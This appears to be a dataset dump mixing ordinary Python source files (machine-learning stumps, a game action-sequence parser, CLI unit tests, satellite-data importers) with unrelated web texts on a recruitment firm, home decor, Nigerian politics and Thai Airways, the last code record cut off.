text
stringlengths 29
850k
|
---|
import math
import numpy
import operator
class DecisionStump():
""" Class for a decision stump, adapted from pyclassic. """
def fit(self, X, Y, w):
feature_index, stump = train_decision_stump(X,Y,w)
self.feature_index = feature_index
self.stump = stump
return self
def predict(self,X):
if len(X.shape)==1:
X = numpy.array([X])
N, d = X.shape
feature_index = self.feature_index
threshold = self.stump.threshold
s = self.stump.s
return s*(2.0*(X[:,feature_index]>threshold).astype(numpy.uint8)-1)
class Stump:
"""1D stump"""
def __init__(self, score, threshold, s):
self.score = score
self.threshold = threshold
self.s = s
def __cmp__(self, other):
return cmp(self.err, other.err)
def train_decision_stump(X,Y,w):
stumps = [build_stump_1d(x,Y,w) for x in X.T]
feature_index = numpy.argmax([s.score for s in stumps])
best_stump = stumps[feature_index]
best_threshold = best_stump.threshold
return feature_index, best_stump
def build_stump_1d(x,y,w):
idx = x.argsort()
xsorted = x[idx]
wy = y[idx]*w[idx]
wy_pos = numpy.clip(wy, a_min=0, a_max=numpy.inf)
wy_neg = numpy.clip(wy, a_min=-numpy.inf, a_max=0)
score_left_pos = numpy.cumsum(wy_pos)
score_right_pos = numpy.cumsum(wy_pos[::-1])
score_left_neg = numpy.cumsum(wy_neg)
score_right_neg = numpy.cumsum(wy_neg[::-1])
score1 = -score_left_pos[0:-1:1] + score_right_neg[-2::-1]
score2 = -score_left_neg[0:-1:1] + score_right_pos[-2::-1]
# using idx will ensure that we don't split between nodes with identical x values
idx = numpy.nonzero((xsorted[:-1] < xsorted[1:]).astype(numpy.uint8))[0]
if len(idx)==0:
return Stump(-numpy.inf, 0, 0)
score = numpy.where(abs(score1)>abs(score2), score1, score2)
ind = idx[numpy.argmax(abs(score[idx]))]
maxscore = abs(score[ind])
threshold = (xsorted[ind] + xsorted[ind+1])/2.0
s = numpy.sign(score[ind]) # direction of -1 -> 1 change
return Stump(maxscore, threshold, s)
|
Longstanding recruitment firm, Noel Recruitment, has opened a brand new office on Tullamore's main street.
With over 30 years’ experience in the recruitment industry, providing resources to many of the leading brands in Ireland, the Noel Group is one of Ireland’s best recognised and largest recruitment organisations.
With seven specialised brands operating from 11 locations throughout Ireland, their industry-specific recruiters supply your business with the people who are best suited to your requirements.
With offices in Galway, Waterford, Limerick, Cork, Naas, Co Kildare, Dublin – Dawson Street, Tallaght and Santry and now on Main Street, Tullamore, Noel can guarantee efficiency, best customer service, reliability and a recruitment company you will want to recommend.
As an employer, whether you require a recruitment service for temporary or permanent positions or are seeking a recruitment partner to supply and manage a flexible workforce we can support you. Whether you are one of Ireland’s leading multinational employers or a growing SME we at the Noel Group can meet your requirements.
With a network of 10 offices in Ireland and over 100 permanent staff, our 24/7 service offers each customer a variety of services from tailored permanent recruitment campaigns to high volume temporary supply solutions. As a customer using our services you will benefit on site from a well prepared and experienced account management structure taking care of everything from Inductions to check-ins, appraisals, disciplinary and full payroll production working to ISO 9001 service requirements.
Our team at the Noel Group work with companies’ right across the country to match you with the job you are looking for. Whether it be permanent, temporary or a contract position we will ensure you as our candidate will be well prepared and supported throughout the process.
How can you register with Noel Group?
Longford – EDI Centre, Athlone Road Longford, Thursday, March 28 - 10am – 4pm. |
"""
Author: Ron Lockwood-Childs
Licensed under LGPL v2.1 (see file COPYING for details)
Container type for sequences of actions.
"""
import re
from pygame_maker.actions.action import Action, ActionException
__all__ = ["ActionSequence", "ActionSequenceStatement",
"ActionSequenceConditional", "ActionSequenceConditionalIf",
"ActionSequenceConditionalElse", "ActionSequenceBlock",
"ActionSequenceStatementException"]
class ActionSequenceStatementException(Exception):
"""
Raised when unknown action names or something other than an action is found
in a sequence, when sequence statements are placed incorrectly, or when an
attempt is made to add something other than an ActionSequenceStatement to a
sequence.
"""
pass
class ActionSequenceStatement(object):
"""
The base class for all action sequence statements.
A "statement" wraps an action and provides structure to represent if/else
conditionals and blocks along with normal executable statements.
:param action: The action to wrap into the statement
:type action: Action
"""
@staticmethod
def get_sequence_item_from_action(action, **kwargs):
"""
Given a name or Action, retrieve its ActionSequenceStatement.
Provide a simple static method to retrieve the right statement
representing the given action: if/else condition, block, or
executable statement. Can also accept a string containing the name
of the action, in which case a new action will be retrieved with
its parameters filled in with the supplied kwargs.
:param action: An action name, or Action instance
:type action: str|Action
:param kwargs: Optional keyword arguments to apply to the named action
:return: The appropriate action sequence statement
:rtype: ActionSequenceStatement
"""
# if given a string, see if it names a known action
new_action = None
if isinstance(action, str):
try:
new_action = Action.get_action_instance_by_name(action, **kwargs)
except ActionException:
raise ActionSequenceStatementException("'{}' is not a known action".format(action))
else:
new_action = action
if not isinstance(new_action, Action):
raise ActionSequenceStatementException("'{}' is not a recognized action")
if new_action.nest_adjustment:
if new_action.name == "else":
return ActionSequenceConditionalElse(new_action)
minfo = Action.IF_STATEMENT_RE.search(new_action.name)
if minfo:
return ActionSequenceConditionalIf(new_action)
if new_action.nest_adjustment != "block_end":
return ActionSequenceBlock(new_action)
return ActionSequenceStatement(new_action)
def __init__(self, action):
self.is_block = False
self.is_conditional = False
self.action = action
def get_action_list(self):
"""
Return the statement's action list.
This method places the action inside a list of length 1.
This aids with unit testing, and it allows an action sequence to be
serialized to storage. The deserialized simple list can be expanded
into an action sequence when the application starts up.
:return: A single-element list containing the wrapped action
:rtype: list
"""
return [self.action]
def pretty_print(self, indent=0):
"""
Display the name of the wrapped action as indented code
:param indent: Number of spaces to indent
:type indent: int
"""
indent_string = "\t" * indent
print("{}{}".format(indent_string, self.action.name))
def __repr__(self):
return "<{}: {}>".format(type(self).__name__, self.action)
class ActionSequenceConditional(ActionSequenceStatement):
"""
Represent a simple conditional ('else' is the only kind this fits).
:param action: The action to wrap into the conditional
:type action: Action
"""
def __init__(self, action):
ActionSequenceStatement.__init__(self, action)
self.is_conditional = True
self.contained_statement = None
def add_statement(self, statement):
"""
Attempt to add a statement to the conditional.
Given a statement, try to add it to the current conditional. If the
clause is empty, set its statement. If the clause holds an open
block or conditional, pass it on.
:param statement: New statement to add to the conditional
:type statement: ActionSequenceStatement
:return: True if there was room for the new statement, otherwise False
:rtype: bool
"""
found_place = True
# basic type check
if not isinstance(statement, ActionSequenceStatement):
raise ActionSequenceStatementException
if not self.contained_statement:
# the statement is now the conditional clause
self.contained_statement = statement
elif (self.contained_statement.is_block and
not self.contained_statement.is_block_closed):
# the statement fits within the conditional clause's block
self.contained_statement.add_statement(statement)
elif (self.contained_statement.is_conditional and
self.contained_statement.add_statement(statement)):
# the contained conditional found a place for the statement
pass
else:
found_place = False
return found_place
def get_action_list(self):
"""
Collect the conditional's list of actions.
This method retrieves all the collected statements inside a simple
conditional into a simple list. This aids with unit testing and
allows an action sequence to be serialized to storage. The
deserialized simple list can be expanded into an action sequence
when the application starts up.
:return: A list containing the conditional's wrapped actions
:rtype: list
"""
contained_list = []
if self.contained_statement:
contained_list = self.contained_statement.get_action_list()
return [self.action] + contained_list
def pretty_print(self, indent=0):
"""
Display an action sequence simple conditional as indented code
:param indent: Number of spaces to indent
:type indent: int
"""
ActionSequenceStatement.pretty_print(self, indent)
if self.contained_statement:
self.contained_statement.pretty_print(indent+1)
def __repr__(self):
repr_str = "<{}:\n".format(type(self).__name__)
repr_str += "\t{}>".format(self.contained_statement)
return repr_str
class ActionSequenceConditionalIf(ActionSequenceConditional):
"""
Represent an entire if/else conditional.
The 'else' clause is also placed here, to avoid having to search earlier
statements to see if there is a free 'if' conditional that matches the
'else'.
:param action: The action to wrap into the 'if' conditional
:type action: Action
"""
def __init__(self, action):
ActionSequenceConditional.__init__(self, action)
self.else_condition = None
def add_statement(self, statement):
"""
Attempt to place the given statement into the clause for the 'if'.
If there is already a block or another conditional, see if the new
statement will be accepted there. If not, check whether the new
statement is an 'else' condition, and that no 'else' condition already
exists. If there is an 'else' condition that hasn't received a
statement yet, add it there. If the 'else' statement exists and
contains another conditional or block, see if the new statement
will be accepted there.
:param statement: New statement to add to the conditional
:type statement: ActionSequenceStatement
:return: True if there was room for the new statement, otherwise False
:rtype: bool
"""
found_place = True
if not ActionSequenceConditional.add_statement(self, statement):
if (not self.else_condition and
isinstance(statement, ActionSequenceConditionalElse)):
self.else_condition = statement
elif (self.else_condition and self.else_condition.is_conditional and
self.else_condition.add_statement(statement)):
# else clause had a place for the new statement
pass
elif (self.else_condition and self.else_condition.is_block and
not self.else_condition.is_block_closed):
self.else_condition.add_statement(statement)
else:
found_place = False
return found_place
def pretty_print(self, indent=0):
"""
Display an action sequence if/else conditional as indented code.
:param indent: Number of spaces to indent
:type indent: int
"""
ActionSequenceConditional.pretty_print(self, indent)
if self.else_condition:
self.else_condition.pretty_print(indent)
def walk(self):
"""
Iterate through each action within a Conditional.
:return: Generator function
:rtype: generator
"""
yield self.action
conditional_path = None
if self.action.action_result:
if not self.contained_statement:
# incomplete "if" path (can only happen to final action in list)
return
conditional_path = self.contained_statement
else:
if not self.else_condition:
# "if" not executed, and no "else" path
return
# no need to return the "else" action itself, it does nothing
conditional_path = self.else_condition.contained_statement
if conditional_path.is_block or conditional_path.is_conditional:
for action in conditional_path.walk():
yield action
else:
yield conditional_path.action
def get_action_list(self):
"""
Collect the conditional's list of actions.
This method retrieves all the collected statements inside a
conditional into a simple list. This aids with unit
testing and allows an action sequence to be serialized
to storage. The deserialized simple list can be expanded into an
action sequence when the application starts up.
:return: A list of the actions wrapped in the If conditional
:rtype: list
"""
contained_list = ActionSequenceConditional.get_action_list(self)
else_list = []
if self.else_condition:
else_list = self.else_condition.get_action_list()
return contained_list + else_list
def __repr__(self):
repr_str = "<{} {}:\n".format(type(self).__name__, self.action)
repr_str += "\t{}\n".format(self.contained_statement)
if self.else_condition:
repr_str += "{}>".format(self.else_condition)
return repr_str
class ActionSequenceConditionalElse(ActionSequenceConditional):
"""
Clone of the ActionSequenceConditional class.
Named for convenience to be used in a ActionSequenceConditionalIf.
:param action: The action to wrap into the 'else' conditional
:type action: Action
"""
def __init__(self, action):
ActionSequenceConditional.__init__(self, action)
class ActionSequenceBlock(ActionSequenceStatement):
"""
Represent a block of action statements.
All statements are placed into a block (even if just the 'main' block) or
into conditionals within a block. The first action in the main block
is set to None.
:param action: Usually a start_of_block action
:type action: Action|None
:param main_block: True if this is the main (outermost) block
:type main_blocK: bool
"""
def __init__(self, action, main_block=False):
# main block doesn't start with an explicit action, so action==None
# is ok. Remember this when trying to use self.action in any
# methods, including superclasses!
ActionSequenceStatement.__init__(self, action)
self.is_block = True
self.is_block_closed = False
self.contained_statements = []
self.main_block = main_block
def _append_statement(self, statement):
# Called by add_statement() when an action is meant for this block.
#
# :param statement: New statement to add to the block
# :type statement: ActionSequenceStatement
# the main block is never explicitly "closed"
if statement.action and statement.action.nest_adjustment == "block_end":
if not self.main_block:
self.is_block_closed = True
self.contained_statements.append(statement)
else:
raise ActionSequenceStatementException("block_end cannot be added to a main block")
elif isinstance(statement, ActionSequenceConditionalElse):
raise ActionSequenceStatementException
else:
self.contained_statements.append(statement)
def add_statement(self, statement):
"""
Add a new statement to an open block.
The action sequence "magic" happens here. Normal statements, "if"
conditionals and blocks can be added to the current block. Open
conditionals (no clause yet) or blocks (no "block_end" action) can
receive new statements. An "else" action can be attached to an "if"
conditional. All statements exist either inside a block (there is
always a "main" block) or a conditional.
:param statement: New statement to add to the block
:type statement: ActionSequenceStatement
"""
# print("Adding statement: {} .. ".format(statement))
if not isinstance(statement, ActionSequenceStatement):
raise TypeError("{} is not an ActionSequenceStatement".format(str(statement)))
last_statement = None
if self.contained_statements:
last_statement = self.contained_statements[-1]
if last_statement and last_statement.is_conditional:
# If the last statement's conditional is still open, this statement
# belongs there. Otherwise, add it to this block
if last_statement.add_statement(statement):
# print("---> to last conditional")
return
if last_statement and last_statement.is_block:
# If the last statement's block is still open, this statement
# belongs there. Otherwise, add it to this block
if not last_statement.is_block_closed:
# print("---> to last block")
last_statement.add_statement(statement)
return
# print("---> to current block")
self._append_statement(statement)
def get_action_list(self):
"""
Collect the conditional's list of actions.
This method retrieves all the collected statements inside a
block into a simple list. This aids with unit testing
and allows an action sequence to be serialized to storage.
The deserialized simple list can be expanded into an action
sequence when the application starts up.
:return: A list of the actions wrapped in the If conditional
:rtype: list
"""
this_action = []
if not self.main_block:
this_action = [self.action]
contained_list = []
if self.contained_statements:
for contained in self.contained_statements:
contained_list += contained.get_action_list()
return this_action + contained_list
def pretty_print(self, indent=0):
"""
Display the action sequence block as indented code.
:param indent: Number of spaces to indent
:type indent: int
"""
new_indent = indent
if not self.main_block:
ActionSequenceStatement.pretty_print(self, indent)
new_indent += 1
if self.contained_statements:
for contained in self.contained_statements:
if contained.action.nest_adjustment != "block_end":
contained.pretty_print(new_indent)
else:
contained.pretty_print(indent)
def walk(self):
"""
Iterate through each action within a block.
:return: Generator function
:rtype: generator
"""
for statement in self.contained_statements:
if statement.action is None:
continue
if statement.action.nest_adjustment == "block_end":
return
if statement.is_conditional or statement.is_block:
for sub_statement_action in statement.walk():
yield sub_statement_action
else:
yield statement.action
def __repr__(self):
repr_str = "<{}:\n".format(type(self).__name__)
for statement in self.contained_statements:
repr_str += "{}\n".format(statement)
repr_str += ">"
return repr_str
class ActionSequence(object):
"""Store a sequence of actions, which runs when triggered by an event."""
FIRST_ITEM_RE = re.compile(r"^\s*([^ ])")
@staticmethod
def load_sequence_from_yaml_obj(sequence_repr):
"""
Create an event action sequence from its YAML representation.
The expected format is as follows::
[{<action_name>: { <action_param>:<action_value>, .. }, ..., ]
:param sequence_repr: The YAML object containing action sequence data
:type sequence_repr: yaml.load() result
:return: The action sequence described in the YAML object
:rtype: ActionSequence
"""
new_sequence = None
if sequence_repr:
new_sequence = ActionSequence()
for action_hash in sequence_repr:
action_name = list(action_hash.keys())[0]
action_params = {}
if action_hash[action_name]:
action_params.update(action_hash[action_name])
next_action = Action.get_action_instance_by_name(action_name, **action_params)
# print("New action: {}".format(next_action))
new_sequence.append_action(next_action)
return new_sequence
def __init__(self):
"""Wrap the outermost ActionSequenceBlock."""
#: The main block, containing all actions in sequence
self.main_block = ActionSequenceBlock(None, True)
def append_action(self, action):
"""
Add a new action to the end of the sequence.
:param action: The name of a defined action, or an Action instance
:type action: str|Action
"""
statement = ActionSequenceStatement.get_sequence_item_from_action(action)
self.main_block.add_statement(statement)
def get_next_action(self):
"""
Iterate through every action in the ActionSequence.
:return: Generator function
:rtype: generator
"""
for next_action in self.main_block.walk():
if next_action is not None:
yield next_action
def to_yaml(self, indent=0):
"""
Produce the YAML representation of the action sequence.
:param indent: Number of spaces to indent each line
:type indent: int
:return: YAML string
:rtype: str
"""
action_list = self.main_block.get_action_list()
sequence_yaml = ""
for action in action_list:
action_yaml_lines = action.to_yaml(indent).splitlines()
for idx, aline in enumerate(action_yaml_lines):
if idx == 0:
sline = str(aline)
minfo = self.FIRST_ITEM_RE.search(aline)
# print("first item match for '{}': {}".format(aline, minfo))
if minfo:
mpos = minfo.start(1)
# print("match pos:{}".format(mpos))
sline = "{}- {}".format(aline[0:mpos], aline[mpos:])
else:
sline = "- {}".format(aline)
sequence_yaml += "{}\n".format(sline)
else:
sequence_yaml += " {}\n".format(aline)
return sequence_yaml
def pretty_print(self):
"""Print out properly-indented action sequence strings."""
self.main_block.pretty_print()
def __repr__(self):
return "{}".format(str(self.main_block))
|
Spring cleaning is the perfect opportunity to de-clutter your home, replace that old worn out furniture that you’ve had for years, and accessorize! Zinc Door offers stylish and modern home decor for every room and this month they’re featuring the popular brand Noir and offering 15% off all throw pillows.
The Noir Ming Bookcase provides multiple shelves and two drawers for accessories and organizational needs. This beautifully crafted bookcase will be the focal point in any room and will provide more storage space for your beloved decorative accessories, souvenirs and awards. A home office can become easily cluttered. A simple fix is to find a desk with multiple drawers. The Noir Hammered Zinc Desk is detailed with nailheads and created from hammered zinc and old wood. This timeless furnishing offers an office six drawers of chic storage. Spring cleaning also means a new wardrobe but who wants to part with their clothes from last year? The Noir Hampton Tall Boy Dresser provides six drawers which delivers maximum storage in a relaxed white washed finish.
Once your space is clean and organized, it’s time to accessorize and create a spring-fresh look! Brighten up a bedroom or living space with decorative pillows. Zinc Door offers a variety of stylish pillows and from now through 4/14, Zinc Door is offering 15% off all throw pillows with promo code throws. Adding bright and colorful accessories will help any room in your home pop!
I love how new throw pillows can freshen up any room. Thanks for sharing.
This is a nice store, thanks for this!
Thank you for that review. You just introduced me to a new place that I love!
I need to check out this site so bad! That’s such a great deal.
Would love to check this site out!! I need new throw pillow desperately!!!
Thank you for sharing. I’m in desperate need of redecorating. |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
import unittest
from datetime import datetime
from unittest import TestCase
from mock import patch, Mock
from click.testing import CliRunner
from statuspage import cli, update, create, iter_systems, get_severity, SYSTEM_LABEL_COLOR
from github import UnknownObjectException
import codecs
class CLITestCase(TestCase):
def setUp(self):
self.patcher = patch('statuspage.Github')
self.gh = self.patcher.start()
# setup mocked label
self.label = Mock()
self.label.color = "171717"
self.label.name = "Website"
self.label1 = Mock()
self.label1.color = "171717"
self.label1.name = "API"
self.gh().get_user().get_repo().get_labels.return_value = [self.label, self.label1]
# set up mocked issue
self.issue = Mock()
self.issue.created_at = datetime.now()
self.issue.state = "open"
self.issue_label = Mock()
self.issue_label.color = "FF4D4D"
self.issue_label.name = "major outage"
self.issue.get_labels.return_value = [self.issue_label, self.label]
self.issue.user.login = "some-dude"
self.comment = Mock()
self.comment.user.login = "some-dude"
self.issue.get_comments.return_value = [self.comment, ]
self.issue1 = Mock()
self.issue1.created_at = datetime.now()
self.issue1.state = "open"
self.issue1.user.login = "some-dude"
self.issue1.get_labels.return_value = [self.issue_label, self.label1]
self.issue1.get_comments.return_value = [self.comment, ]
self.gh().get_user().get_repo().get_issues.return_value = [self.issue, self.issue1]
self.template = Mock()
self.template.decoded_content = b"some foo"
self.template.content = codecs.encode(b"some other foo", "base64")
self.gh().get_user().get_repo().get_file_contents.return_value = self.template
self.gh().get_organization().get_repo().get_file_contents.return_value = self.template
self.collaborator = Mock()
self.collaborator.login = "some-dude"
self.gh().get_user().get_repo().get_collaborators.return_value = [self.collaborator,]
self.gh().get_organization().get_repo().get_collaborators.return_value = [self.collaborator,]
def tearDown(self):
self.patcher.stop()
@patch("statuspage.run_update")
def test_create(self, run_update):
label = Mock()
self.gh().get_user().create_repo().get_labels.return_value = [label,]
runner = CliRunner()
result = runner.invoke(
create,
["--name", "testrepo", "--token", "token", "--systems", "sys1,sys2"]
)
self.assertEqual(result.exit_code, 0)
self.gh.assert_called_with("token")
@patch("statuspage.run_update")
def test_create_org(self, run_update):
runner = CliRunner()
result = runner.invoke(
create,
["--name", "testrepo",
"--token", "token",
"--systems", "sys1,sys2",
"--org", "some"]
)
self.assertEqual(result.exit_code, 0)
self.gh.assert_called_with("token")
self.gh().get_organization.assert_called_with("some")
def test_update(self):
runner = CliRunner()
result = runner.invoke(update, ["--name", "testrepo", "--token", "token"])
self.assertEqual(result.exit_code, 0)
self.gh.assert_called_with("token")
self.gh().get_user().get_repo.assert_called_with(name="testrepo")
self.gh().get_user().get_repo().get_labels.assert_called_once_with()
def test_dont_update_when_nothing_changes(self):
runner = CliRunner()
self.template.content = codecs.encode(b"some foo", "base64")
result = runner.invoke(update, ["--name", "testrepo", "--token", "token"])
self.assertEqual(result.exit_code, 0)
self.gh.assert_called_with("token")
self.gh().get_user().get_repo.assert_called_with(name="testrepo")
self.gh().get_user().get_repo().get_labels.assert_called_once_with()
self.gh().get_user().get_repo().update_file.assert_not_called()
def test_update_org(self):
runner = CliRunner()
result = runner.invoke(update, ["--name", "testrepo", "--token", "token", "--org", "some"])
self.assertEqual(result.exit_code, 0)
self.gh.assert_called_with("token")
self.gh().get_organization().get_repo.assert_called_with(name="testrepo")
self.gh().get_organization().get_repo().get_labels.assert_called_once_with()
def test_update_index_does_not_exist(self):
self.gh().get_user().get_repo().update_file.side_effect = UnknownObjectException(status=404, data="foo")
runner = CliRunner()
result = runner.invoke(update, ["--name", "testrepo", "--token", "token"])
self.assertEqual(result.exit_code, 0)
self.gh.assert_called_with("token")
self.gh().get_user().get_repo.assert_called_with(name="testrepo")
self.gh().get_user().get_repo().get_labels.assert_called_once_with()
self.gh().get_user().get_repo().create_file.assert_called_once_with(
branch='gh-pages',
content='some foo',
message='initial',
path='/index.html'
)
def test_update_non_labeled_issue_not_displayed(self):
self.issue.get_labels.return_value = []
runner = CliRunner()
result = runner.invoke(update, ["--name", "testrepo", "--token", "token"])
self.assertEqual(result.exit_code, 0)
# make sure that get_comments is not called for the first issue but for the second
self.issue.get_comments.assert_not_called()
self.issue1.get_comments.assert_called_once_with()
def test_update_non_colaborator_issue_not_displayed(self):
self.issue.user.login = "some-other-dude"
runner = CliRunner()
result = runner.invoke(update, ["--name", "testrepo", "--token", "token"])
self.assertEqual(result.exit_code, 0)
# make sure that get_comments is not called for the first issue but for the second
self.issue.get_comments.assert_not_called()
self.issue1.get_comments.assert_called_once_with()
class UtilTestCase(TestCase):
def test_iter_systems(self):
label1 = Mock()
label2 = Mock()
label1.name = "website"
label1.color = SYSTEM_LABEL_COLOR
self.assertEqual(
list(iter_systems([label1, label2])),
["website", ]
)
self.assertEqual(
list(iter_systems([label2])),
[]
)
def test_severity(self):
label1 = Mock()
label2 = Mock()
label1.color = "FF4D4D"
self.assertEqual(
get_severity([label1, label2]),
"major outage"
)
label1.color = "000000"
self.assertEqual(
get_severity([label1, label2]),
None
)
if __name__ == '__main__':
unittest.main() |
The Federal Government says the Indigenous People of Biafra (IPOB) is ignorant of the depth of unity in the diversity of Nigeria.
The Minister of Information and Culture, Alhaji Lai Mohammed stated this on Wednesday in Abuja when he featured on “Embelembe” a phone-in radio programme on 101.1 Human Rights Radio.
The Minister faulted the group over hate and divisive speeches by its leader, Nnamdi Kanu, the violent attack of the military and extortion of innocent Nigerian at illegal road blocks.
Giving instances, the Minister said that the call by Kanu on the Igbo “not to attend any Church where the pastor is a Yoruba man” is premised on ignorance on the diversity of the country.
Mohammed said that the Mountain of Fire Ministry established by an Igbo, has a Football Club owned by a Yoruba, with a coach from Igbo extraction and players across all the regions and tribes of the country.
He stressed that Nigerians are so interwoven and united and a call for violent division would not succeed.
Mohammed noted that the Federal government was not adverse to agitations from any quarter provided it is carried out in a manner that would not result into violence and war.
He commended the military, the state governors particularly from the East and the North, the traditional rulers and religious leaders for their timely intervention to nip the crises started by IPOB’s in the bud.
The Minister said the government of President Muhammadu Buhari is passionate about the plight of Nigerians and would not rest until it makes life easier for everyone.
He said as a listening government, the Administration is taking concrete steps to address the environmental degradation in the Niger Delta.
Mohammed also disclosed that no fewer than 3 million pupils were being fed in 14 states while 30,000 cooks were engaged through the Federal Government feeding programme.
He enjoined Nigerians and followers of the programme to download his ministry’s information apps, “FGNiapp” to access authentic information, programmes and agenda of the government.
The anchor of the programme, Ahmed Isa, popularly called “Ordinary President” said Nigeria’s unity is like a bunch of broom, the more and bigger it is, the better for the country.
He expressed worry over the dimension the IPOB protest was going, stressing that government must do all within it means to address it.
Isa said: “The way things are going, I am not happy. |
import pyrat, os
import logging
from osgeo import gdal
import glob
import numpy as np
class ENVISAT(pyrat.ImportWorker):
"""
Import of ENVISAT satellite data.
**author:** Andreas Reigber\n
**status:** --beta-- No metadata are extracted. Mostly untested!
"""
gui = {'menu': 'File|Import spaceborne', 'entry': 'ENVISAT'}
para = [{'var': 'file', 'value': '', 'type': 'openfile', 'text': 'Product file (*.N1)'}]
def __init__(self, *args, **kwargs):
super(ENVISAT, self).__init__(*args, **kwargs)
self.name = "ENVISAT IMPORT"
if len(args) == 1:
self.file = args[0]
def getsize(self, *args, **kwargs):
self.ds = gdal.Open(self.file)
if self.ds is not None:
self.band = []
for band in range(self.ds.RasterCount):
self.band.append(self.ds.GetRasterBand(band + 1))
return self.ds.RasterYSize, self.ds.RasterXSize
else:
logging.error("ERROR: product directory not recognised!")
return False, False
def block_reader(self, *args, **kwargs):
array = []
for band in self.band:
array.append(band.ReadAsArray(xoff=0, yoff=kwargs['block'][0], win_ysize=self.blocksize))
if len(array) == 1:
return array[0]
else:
return array
def close(self, *args, **kwargs):
self.ds = None # correct according to GDAL manual!!??
def getmeta(self, *args, **kwargs):
meta = {}
meta['sensor'] = "ENVISAT"
metain = self.ds.GetMetadata()
meta.update(metain)
for band in self.band:
metain = band.GetMetadata()
meta.update(metain)
return meta
@pyrat.docstringfrom(ENVISAT)
def envisat(*args, **kwargs):
return ENVISAT(*args, **kwargs).run(*args, **kwargs)
class PALSAR(pyrat.ImportWorker):
"""
Import of PALSAR satellite data. Only level 1.1. and 1.5 are supported.
**author:** Andreas Reigber\n
**status:** --beta-- No metadata are extracted. Mostly untested!
"""
gui = {'menu': 'File|Import spaceborne', 'entry': 'PALSAR'}
para = [{'var': 'dir', 'value': '', 'type': 'opendir', 'text': 'Product directory'}]
def __init__(self, *args, **kwargs):
super(PALSAR, self).__init__(*args, **kwargs)
self.name = "PALSAR IMPORT"
if len(args) == 1:
self.dir = args[0]
def getsize(self, *args, **kwargs):
volfile = glob.glob(self.dir + "/VOL*")
if len(volfile) > 0:
self.ds = gdal.Open(volfile[0])
if self.ds is not None:
self.band = []
for band in range(self.ds.RasterCount):
self.band.append(self.ds.GetRasterBand(band + 1))
return len(self.band), self.ds.RasterYSize, self.ds.RasterXSize
else:
logging.error("ERROR: product directory not recognised!")
return False, False
else:
logging.error("ERROR: volume file not found!")
return False, False
def block_reader(self, *args, **kwargs):
array = []
for band in self.band:
array.append(band.ReadAsArray(xoff=0, yoff=kwargs['block'][0], win_ysize=self.blocksize))
out = np.empty((len(array),) + array[0].shape, dtype=array[0].dtype)
for k in range(len(array)):
out[k, ...] = array[k]
out[~np.isfinite(out)] = 0
return out.squeeze()
def close(self, *args, **kwargs):
self.ds = None # correct according to GDAL manual!!??
def getmeta(self, *args, **kwargs):
meta = {}
meta['sensor'] = "PALSAR"
metain = self.ds.GetMetadata()
meta.update(metain)
for band in self.band:
metain = band.GetMetadata()
meta.update(metain)
return meta
@pyrat.docstringfrom(PALSAR)
def palsar(*args, **kwargs):
return PALSAR(*args, **kwargs).run(*args, **kwargs)
class Radarsat2(pyrat.ImportWorker):
"""
Import of Radarsat-2 satellite data.
**author:** Andreas Reigber\n
**status:** --beta-- No metadata are extracted. Mostly untested!
"""
gui = {'menu': 'File|Import spaceborne', 'entry': 'Radarsat-2'}
para = [{'var': 'dir', 'value': '', 'type': 'opendir', 'text': 'Product directory'}]
def __init__(self, *args, **kwargs):
super(Radarsat2, self).__init__(*args, **kwargs)
self.name = "RADARSAT-2 IMPORT"
if len(args) == 1:
self.dir = args[0]
def getsize(self, *args, **kwargs):
volfile = glob.glob(self.dir + "/product.xml")
if len(volfile) > 0:
self.ds = gdal.Open(volfile[0])
if self.ds is not None:
self.band = []
for band in range(self.ds.RasterCount):
self.band.append(self.ds.GetRasterBand(band + 1))
return len(self.band), self.ds.RasterYSize, self.ds.RasterXSize
else:
logging.error("ERROR: product directory not recognised!")
return False, False
else:
logging.error("ERROR: product.xml file not found!")
return False, False
def block_reader(self, *args, **kwargs):
array = []
for band in self.band:
array.append(band.ReadAsArray(xoff=0, yoff=kwargs['block'][0], win_ysize=self.blocksize))
out = np.empty((len(array),) + array[0].shape, dtype=array[0].dtype)
for k in range(len(array)):
out[k, ...] = array[k]
out[~np.isfinite(out)] = 0
return out.squeeze()
def close(self, *args, **kwargs):
self.ds = None # correct according to GDAL manual!!??
def getmeta(self, *args, **kwargs):
meta = {}
meta['sensor'] = "Radarsat-2"
metain = self.ds.GetMetadata()
meta.update(metain)
meta['CH_pol'] = []
for band in self.band:
metain = band.GetMetadata()
meta['CH_pol'].append(metain['POLARIMETRIC_INTERP'])
meta.update(metain)
return meta
@pyrat.docstringfrom(Radarsat2)
def radarsat2(*args, **kwargs):
return Radarsat2(*args, **kwargs).run(*args, **kwargs)
class Sentinel1(pyrat.ImportWorker):
"""
Very basic import of Sentinel-1 satellite data. The current driver uses GDAL and therefore does not
perform debursting and combination of subswaths. This routine needs to be improved in future.
**author:** Andreas Reigber\n
**status:** --beta-- Mostly untested!
"""
gui = {'menu': 'File|Import spaceborne', 'entry': 'Sentinel-1 (primitive)'}
para = [{'var': 'dir', 'value': '', 'type': 'opendir', 'text': 'Product directory'}]
def __init__(self, *args, **kwargs):
super(Sentinel1, self).__init__(*args, **kwargs)
self.name = "SENTINEL-1 IMPORT"
def reader(self, *args, **kwargs):
volfile = glob.glob(self.dir + "/manifest.safe")
if len(volfile) > 0:
self.ds = gdal.Open(volfile[0])
if self.ds is not None:
self.band = []
for band in range(self.ds.RasterCount):
self.band.append(self.ds.GetRasterBand(band + 1))
nswath = len(self.band)
YSize = [band.YSize for band in self.band]
XSize = [band.XSize for band in self.band]
else:
logging.error("ERROR: product directory not recognised!")
return False, False
else:
logging.error("ERROR: manifest.save file not found!")
return False, False
array = []
for band in self.band:
array.append(band.ReadAsArray())
meta = {}
meta['sensor'] = "Sentinel-1"
metain = self.ds.GetMetadata()
meta.update(metain)
return array, meta
def close(self, *args, **kwargs):
self.ds = None # correct according to GDAL manual!!??
def sentinel1(*args, **kwargs):
return Sentinel1(*args, **kwargs).run(*args, **kwargs)
|
Piyasvasti Amranand, president of Thai Airways International, tells ABTN about the airline's plans for growth, new products and new aircraft.
Thai Airways has agreed terms to lease eight Boeing 777-300ER twin jets.
Thai Airways and Singapore airline Tiger Airways are set to form a new low cost carrier.
Starting June 1, premium fare passengers booking Thai Airways between Bangkok, Paris CDG and Tokyo Narita will be sampling some of the world's best seating such as suites in first class and fully flat beds in business class. |
from twisted.web import client
from twisted.internet import reactor, defer, ssl
from urlparse import urlparse
class HTTPProgressDownloader(client.HTTPDownloader):
def __init__(self, url, outfile, headers = None):
